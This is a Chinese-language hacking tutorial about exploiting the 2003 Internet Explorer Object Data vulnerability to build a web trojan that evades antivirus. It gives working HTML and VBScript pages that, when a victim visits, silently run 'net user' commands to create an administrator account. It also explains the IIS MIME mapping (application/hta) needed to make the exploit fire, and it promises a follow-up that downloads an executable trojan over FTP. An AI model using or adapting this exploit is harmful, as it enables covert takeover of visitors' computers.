利用Internet Explorer Object Data漏洞制做全新网页木马 今年8月20日,微软公开了一个最高严重等级的重要漏洞--Internet Explorer Object数据远程执行漏洞。这对于网页木马爱好者来说可是一件好事,我们能够用这个漏洞来制做一款全新的暂时不会被查杀的木马了。在介绍如何制做这个全新网页木马前我先给大家简单介绍一下该漏洞。
一、漏洞描述
该漏洞内由eEye Digital Security发现并于8月20号公开的,微软同一天也发布了相应的公告。在eEye的网站公开页面http://www.eeye.com/html/Research/Advisories/AD20030820.html这个文档中提到,Microsoft Internet Explorer是一款流行的WEB浏览程式,Internet Explorer在处理对象"Object"标记时没有正确处理要被装载的文档参数。
"Object"标记用于插入ActiveX组件等对象到HTML页面。"Object"标记的"Type"属性用于配置或获取对象的MIME类型。通常合法MIME类型包括"plain/text"或"application/hta", "audio/x-mpeg"等。Internet Explorer指定远程对象数据位置的参数没有充分检查被装载的文档属性,攻击者能够构建恶意页面,诱使用户访问来运行恶意页面指定的程式 。Windows 2003 Internet Explorer由于使用了"Enhanced Security Configuration Mode"模式,默认是使用 了"Disable ActiveX",因此此漏洞在Windows 2003 IE级别为中等。
这段描述很专业,但是看不懂的菜鸟能够跳过,直接学制做方法。:-)
二、受影响的系统版本
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.5SP2
Microsoft Internet Explorer 5.5SP1
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.0.1SP3
Microsoft Internet Explorer 5.0.1SP2
Microsoft Internet Explorer 5.0.1SP1
Microsoft Internet Explorer 6.0SP1
- Microsoft Windows XP
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2003 Web Edition
- Microsoft Windows 2003 Standard Edition
- Microsoft Windows 2003 Enterprise Edition 64-bit
- Microsoft Windows 2003 Enterprise Edition
- Microsoft Windows 2003 Datacenter Edition 64-bit
- Microsoft Windows 2003 Datacenter Edition
- Microsoft Windows 2000
三、漏洞利用周详方法
根http://www.eeye.com/html/Research/Advisories/AD20030820.html这个页面的提示,我写出了两个简单的测试页面。请先看代码和注释,我再来讲解一下。 --------------test.htm代码开始-----------------
<html>
<body>
这是个测试页,假如您的系统是w2k或xp,访问后将会增加一个用户名是lcx密码是lcxlcx的管理用户
<object data="http://127.0.0.1/test.test";></object>
<!--这就是来调用一个恶意页面了test.test,我是在本机测试的,放在我的iis管理器根目录下,所以urlhttp://127.0.0.1;假如您要用这段代码,请更改相应的网test.test的url地址,http://127.0.0.1/test.test改成http://您的url/test.test--!>
</body>
------------test.htm代码结束-------------- --------------test.htm中写到的test.test代码开始------------------
<html>
<object id=wsh classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B></object>
<script language=vbscript>
set wshshell=createobject ("wscript.shell" )
a=wshshell.run ("cmd.exe /c net user lcx lcxlcx /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators lcx /add",0)
这是加一个用户是lcx密码是lcxlcx的管理用户,这段vbs您应当会看懂
</script>
</html>
------------test.test代码结束--------------- 我们的恶意页面已构造完成,此时将test.htm和test.test放在网站同一目录里,像我是放http://127.0.0.1/下;直接打http://127.0.0.1/test.htm并不会在执行者的机器上执行test.test里的代码的,不会加一个用户是lcx密码是lcxlcx的管理用户的。我们还需要配置一下服务器的配置才行。漏洞描述中提到:Internet Explorer指定远程对象数据位置的参数没有充分检查被装载的文档属性。这段话具体是什么意思呢,怎样体现呢?请跟着我来做您就明白了:我们依次打开控制面板--管理工具--Internet 服务管理器-找一个web站点,像我的电脑是默认的web站点--右键属性--点http头,如图1。
然后再更改服务器的MIME映射,使扩展名.test对应为application/hta。做法就是点图1的文档类型图标,在弹出的文档类型对话框里点新增按扭,然后分别在关联扩展名输入框里写入.test,在内容类型(mime)里写入application/hta。如图2所示。
一切配置好后点确定了,我们此时再来打开test.htm,test.test里的恶意代码就会成功执行了。我执行test.htm时,我的最新升级的vrv杀毒软件竟然一点提示都没有。
值得注意的是,由于我的test.htm调用文档是test.test,文档后缀是.test,所以在iis管理器里(图1图2)用application/hta来对应.test。假如您调用的是test.xxx,那么您也要在iis管理器里用application/hta对应.xxx。
这两段代码只是在被执行者的机器里加一个用户而已,难道不能执行一个exe木马吗?当然能够!我用了一个晚上的时间,终于将这段代码写好了,而且调试也成功了。在写出这段代码前,大家先来复习一下如何在dos下用ftp.exe命令来下载文档。
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
